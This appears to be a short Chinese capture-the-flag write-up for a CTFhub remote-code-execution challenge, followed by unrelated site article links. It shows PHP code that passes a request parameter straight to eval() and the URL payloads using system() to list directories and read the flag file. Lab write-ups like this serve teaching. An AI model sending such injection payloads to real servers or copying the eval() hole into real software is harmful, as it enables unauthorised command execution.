CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
Remember_99311 小时前
Spring 中 REST API 调用工具对比:RestTemplate vs OpenFeign
java·网络·后端·算法·spring·php
Y_0311 小时前
浅谈Java虚拟机JVM
java·开发语言·jvm
我命由我1234511 小时前
JUnit - 自定义 Rule
android·java·开发语言·数据库·junit·java-ee·android-studio
魔都吴所谓11 小时前
【html】倒计时器实现demo
javascript·css·html
阿杰 AJie11 小时前
使用Iterator迭代器在遍历中安全删除元素
java·spring
json{shen:"jing"}11 小时前
16_Vue引入路由配置 17.路由传递参数
前端·javascript·vue.js
机器视觉的发动机11 小时前
大语言模型:从理论起源到技术革命
前端·javascript·自动化·视觉检测·ecmascript·easyui·机器视觉
螺旋小蜗11 小时前
docker-compose文件属性(14)build
java·docker·eureka
多多*11 小时前
程序设计工作室1月28日内部训练赛 题解
java·开发语言·windows·哈希算法·散列表
m0_7360348514 小时前
1.28笔记
前端·chrome·笔记
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Clawdbot 中文汉化版 接入微信、飞书04【网络安全测试】Burp Suite工具使用说明、配置及常见问题(有关必回)05Claude Code Skills 实用使用手册06在Trae中使用Pencil MCP07struts2 XML外部实体注入漏洞复现(CVE-2025-68493)08UV安装并设置国内源09零门槛部署本地 AI 助手:Clawdbot/Meltbot 部署深度保姆级教程10AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南